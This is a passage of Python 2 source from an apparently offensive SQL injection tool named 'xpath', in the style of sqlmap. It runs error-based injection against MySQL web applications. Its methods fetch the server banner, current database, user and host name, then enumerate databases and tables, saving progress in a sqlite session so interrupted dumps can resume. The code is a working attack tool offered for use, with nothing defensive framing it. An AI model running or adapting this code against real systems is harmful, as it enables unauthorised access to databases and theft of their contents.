self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (POST)'
self._logs += 'Parameter: (POST)\n'
print compat_color.fw + compat_color.sn + '\tType: error-based'
self._logs += '\tType: error-based\n'
print compat_color.fw + compat_color.sn + '\tTitle: %s' % TITLE
self._logs += '\tTitle: %s\n' % TITLE
print compat_color.fw + compat_color.sn + '\tPayload: %s' % tgt
self._logs += '\tPayload: %s\n' % tgt
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Initial Injection data insertion into the Tables
_data = '"POST", "error-based", "%s", "%s"' % (TITLE, tgt)
sqlite.SessionInsert(self._PathSession, _tableSession, Cols=(_colsSession).replace(" TEXT",""), Data=_data)
sqlite.SessionInsert(self._PathSession, _tablePayload, Cols=(_colsPayload).replace(" TEXT",""), Data=_data)
# web app response and web server response headers
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
self._logs += "the back-end DBMS is MySQL\n"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
if vul:
# writing into the target.txt file (target, injection type)
w = "%s (%s)" % (self._url, "POST")
with open(str(self._PathPloads), "w") as fw:
fw.write(str(w))
fw.close()
# flag check for basic or advance extraction
if flag == 'basic':
# extracts basics (version, database, user, host)
self.XpathBasic(tgt, _tableSession, _colAlter, _name, Payloads)
else:
# extracts (dbs, tables, columns, dumps data from columns)
_flag = False
if Dbname and not TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname)
elif Dbname and TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName)
elif Dbname and TblName and ColList:
										__dlist = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName, ColsList=ColList)
										_dlist = "%s" % (__dlist)
										return _dlist
else:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads)
return __dlist, __dumped
break
except Exception as e:
continue
def Banner(self):
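		# Banner: fetches the DBMS banner (version string), resuming from a stored session when
		# one exists, otherwise starting a fresh injection with the BANNER payloads.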
# Table Session to check previous session using Version (Banner) Column
_tableSession = self.tblSession
_colVersion = self.colVer
# Name to fetch for output
_name = "banner"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = BANNER (Version extracting payloads)
# Name = _name (banner)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colVersion, _name, BANNER)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
pass
else:
					# If data exists in the Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session Version check
banner = sqlite.SessionPrev(self._PathSession, _tableSession, (_colVersion).replace(" TEXT", ""))[0][0]
except Exception as e:
						# If it does not exist, extract it again from the target
self.XpathBasic(_payload, _tableSession, _colVersion, _name, BANNER)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (banner)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "banner: '%s'" % (banner)
self._logs += "banner: %s\n\n" % (banner)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
		# TODO: handle the POST (self._url and self._data) case here
def Database(self):
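		# Database: fetches the current database name, resuming from a stored session when
		# possible, otherwise injecting with the CURRENTDB payloads.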
		# Table Session to check previous session using the current database column
_tableSession = self.tblSession
_colDatabase = self.colCdb
# Name to fetch for output
_name = "current database"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
				# Payloads = CURRENTDB (current database extracting payloads)
				# Name = _name (current database)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colDatabase, _name, CURRENTDB)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
pass
else:
					# If data exists in the Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session Database check
database = sqlite.SessionPrev(self._PathSession, _tableSession, (_colDatabase).replace(" TEXT", ""))[0][0]
except Exception as e:
						# If it does not exist, extract it again from the target
self.XpathBasic(_payload, _tableSession, _colDatabase, _name, CURRENTDB)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (database)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "current database: '%s'" % (database)
self._logs += "current database: %s\n\n" % (database)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def User(self):
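		# User: fetches the current database user, resuming from a stored session when possible,
		# otherwise injecting with the CURRENTUSER payloads.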
		# Table Session to check previous session using the current user column
_tableSession = self.tblSession
_colUser = self.colUsr
# Name to fetch for output
_name = "current user"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = CURRENTUSER (User extracting payloads)
# Name = _name (current user)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colUser, _name, CURRENTUSER)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
pass
else:
					# If data exists in the Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session User check
user = sqlite.SessionPrev(self._PathSession, _tableSession, (_colUser).replace(" TEXT", ""))[0][0]
except Exception as e:
						# If it does not exist, extract it again from the target
self.XpathBasic(_payload, _tableSession, _colUser, _name, CURRENTUSER)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (user)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "current user: '%s'" % (user)
self._logs += "current user: %s\n\n" % (user)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Host(self):
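		# Host: fetches the database host name, resuming from a stored session when possible,
		# otherwise injecting with the HOSTNAMES payloads.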
		# Table Session to check previous session using the host name column
_tableSession = self.tblSession
_colHost = self.colHst
# Name to fetch for output
_name = "host name"
# flag setting
_flag = "basic"
# Setting path to session.sqlite file
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
# Get data injection
try:
# Previous Session check
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except Exception as e:
# if no previous Session then create it
# Payloads = HOSTNAMES (Hosts extracting payloads)
# Name = _name (host)
# flag = _flag (basic)
try:
self.XpathInject(_flag, _colHost, _name, HOSTNAMES)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
try:
# Table Session 1st row
row = PrevSession[0]
except Exception as e:
raise e
else:
					# If data exists in the Table Session
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Request for web app and web server response headers
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
try:
# Previous Session host check
host = sqlite.SessionPrev(self._PathSession, _tableSession, (_colHost).replace(" TEXT", ""))[0][0]
except Exception as e:
						# If it does not exist, extract it again from the target
self.XpathBasic(_payload, _tableSession, _colHost, _name, HOSTNAMES)
else:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (host)
compat_sleep(0.5)
print compat_color.fw + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
self._logs += "back-end DBMS: MySQL >= 5.1\n"
print compat_color.fw + compat_color.sb + "host name: '%s'" % (host)
self._logs += "host name: %s\n\n" % (host)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Databases(self):
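		# Databases: enumerates the available database names (count first, then names), resuming
		# partially dumped name lists from the stored session where possible.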
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
_colList = [self.colDbp, self.colDbc, self.colDbs]
_nameList = "database names"
_listPayload = [DB_COUNT, DB_NAMES]
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
# Injection if no previous Session found..
try:
__dlist, __dumped = self.XpathInject(_flag, _colList, _nameList, _listPayload)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (__dumped)
self._logs += "available databases [%s]:\n" % (__dumped)
for dbs in __dlist:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
try:
row = PrevSession[0]
except Exception as e:
raise e
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
dbsCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
# Injection if user interrupted while counting databases (failed to find previous session database count)
_flag = False
__dlist, __dumped = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload)
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (__dumped)
self._logs += "available databases [%s]:\n" % (__dumped)
for dbs in __dlist:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (dbsCount)
try:
dbs_names = (sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[2]).replace(" TEXT", ""))[0][0]).split(",")
except Exception as e:
# Injection if user interrupted while started dumping database names (failed to find previous session for database names)
_flag = True
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=dbsCount)
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (dbsCount)
self._logs += "available databases [%s]:\n" % (dbsCount)
for dbs in _dlist:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
for dbs in dbs_names:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (dbs)
if len(dbs_names) == int(dbsCount):
print compat_color.fw + compat_color.sd + "available databases [%s]:" % (dbsCount)
self._logs += "available databases [%s]:\n" % (dbsCount)
for dbs in dbs_names:
print compat_color.fw + compat_color.sd + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
else:
# Injection if user interrupted in between of dumping database names (resuming from previous session dumped database names)
_init = len(dbs_names)
_total = int(dbsCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
_ch = ','.join(map(str, dbs_names))
_remaining, _, __dlist, __ = self.XpathDump(_init, _total, _retVal)
_data = '"%s,%s"' % (_ch,_remaining)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colList[2]).replace(" TEXT",""), Data=_data)
dbs_names.extend(__dlist)
print compat_color.fg + compat_color.sb + "available databases [%s]:" % (_total)
self._logs += "available databases [%s]:\n" % (_total)
for dbs in dbs_names:
print compat_color.fg + compat_color.sb + "[*] %s" % (dbs)
self._logs += "[*] %s\n" % (dbs)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Tables(self, Dbname=None):
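		# Tables: enumerates the table names of the given database (count first, then names),
		# resuming partially dumped lists from the stored session where possible.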
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
if Dbname:
_dbName = Dbname
_Tblc = "`%sCount` TEXT" % (Dbname)
_Tbls = "`%sNames` TEXT" % (Dbname)
_colList = [self.colTbp, _Tblc, _Tbls]
_nameList = "tables for database: '%s'" % (_dbName)
_listPayload = [TBL_COUNT_FROM_DBS, TBL_DUMP_FROM_DBS]
else:
# Dump tables using default query (where table_Schema != information_Schema)
pass
if compat_exist(self._tgt):
ses = "%s/%s" % (self._tgt, self._SFile) if os.name is "posix" else "%s\\%s" % ((self._tgt).replace("\/","\\"), self._SFile)
self._PathSession = ses
try:
PrevSession = sqlite.SessionShow(self._PathSession, _tableSession)
except (Exception, IOError) as e:
try:
__dlist, __ = self.XpathInject(_flag, _colList, _nameList, _listPayload, Dbname=_dbName)
except Exception as e:
print '\n' + compat_color.fw + compat_color.sb + "["+compat_strftime("%H:%M:%S")+"] [INFO] target is not vulnerable to error-based (FLOOR) injection try other techniques.."
else:
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(__dlist))
self._logs += "[%s tables]:\n" % (len(__dlist))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in __dlist:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
try:
row = PrevSession[0]
except Exception as e:
pass
else:
_param, _type, _title, _payload = row[1], row[2], row[3], row[4]
print compat_color.fw + compat_color.sn + "xpath resumed the following injection point(s) from stored session:"
self._logs += '\nxpath resumed the following injection point(s) from stored session:\n'
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (%s)' % (_param)
self._logs += 'Parameter: (%s)\n' % (_param)
print compat_color.fw + compat_color.sn + '\tType: %s' % (_type)
self._logs += '\tType: %s\n' % (_type)
print compat_color.fw + compat_color.sn + '\tTitle: %s' % (_title)
self._logs += '\tTitle: %s\n' % (_title)
print compat_color.fw + compat_color.sn + '\tPayload: %s' % (_payload)
self._logs += '\tPayload: %s\n' % (_payload)
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
req = compat_request(self._url, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
try:
tblsCount = sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[1]).replace(" TEXT", ""))[0][0]
except Exception as e:
_flag = False
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Name=_nameList, Payloads=_listPayload, Dbname=_dbName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(_dlist))
self._logs += "[%s tables]:\n" % (len(_dlist))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in _dlist:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_nameList)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (tblsCount)
try:
tbls_names = (sqlite.SessionPrev(self._PathSession, _tableSession, (_colList[2]).replace(" TEXT", ""))[0][0]).split(",")
except Exception as e:
_flag = True
_dlist, __ = self.XpathAdvance(_flag, _payload, _colList, Payloads=_listPayload, total=tblsCount, Dbname=_dbName)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(_dlist))
self._logs += "[%s tables]:\n" % (len(_dlist))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in _dlist:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
if len(tbls_names) == int(tblsCount):
print compat_color.fw + compat_color.sd + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fw + compat_color.sd + "[%s tables]:" % (tblsCount)
self._logs += "[%s tables]:\n" % (tblsCount)
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in tbls_names:
_tables.add_row([tbl])
print compat_color.fw + compat_color.sd + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
else:
_init = len(tbls_names)
_total = int(tblsCount)
try:
_retVal = (sqlite.SessionPrev(self._PathSession, _tablePayload, (_colList[0]).replace(" TEXT", ""))[0][0])
except Exception as e:
raise e
else:
for tbls in tbls_names:
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] resumed: %s" % (tbls)
_ch = ','.join(map(str, tbls_names))
_remaining, _, __dlist, __ = self.XpathDump(_init, _total, _retVal)
_data = '"%s,%s"' % (_ch,_remaining)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colList[2]).replace(" TEXT",""), Data=_data)
tbls_names.extend(__dlist)
print compat_color.fg + compat_color.sb + "Database: %s" % (_dbName)
self._logs += "Database: %s\n" % (_dbName)
print compat_color.fg + compat_color.sb + "[%s tables]:" % (len(tbls_names))
self._logs += "[%s tables]:\n" % (len(tbls_names))
_tables = compat_prettytable(["Tables"])
_tables.align = "l"
_tables.header = False
for tbl in tbls_names:
_tables.add_row([tbl])
print compat_color.fg + compat_color.sb + "%s" % (_tables)
self._logs += "%s\n" % (_tables)
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
print "\n" + compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetched data logged to text files under '%s'" % (self._PathLogs)
self._logs = ""
def Columns(self, Dbname=None, TblName=None):
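		# Columns: enumerates the column names of the given table (count first, then names),
		# resuming partially dumped lists from the stored session where possible.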
_flag = "advance"
_tableSession = self.tblSession
_tablePayload = self.tblPayload
if Dbname and TblName:
_dbName = Dbname
_tblName = TblName
_Clc = "`%s_%sCount` TEXT" % (_dbName, _tblName)
_Cls = "`%s_%sNames` TEXT" % (_dbName, _tblName)
_colList = [self.colClp, _Clc, _Cls]
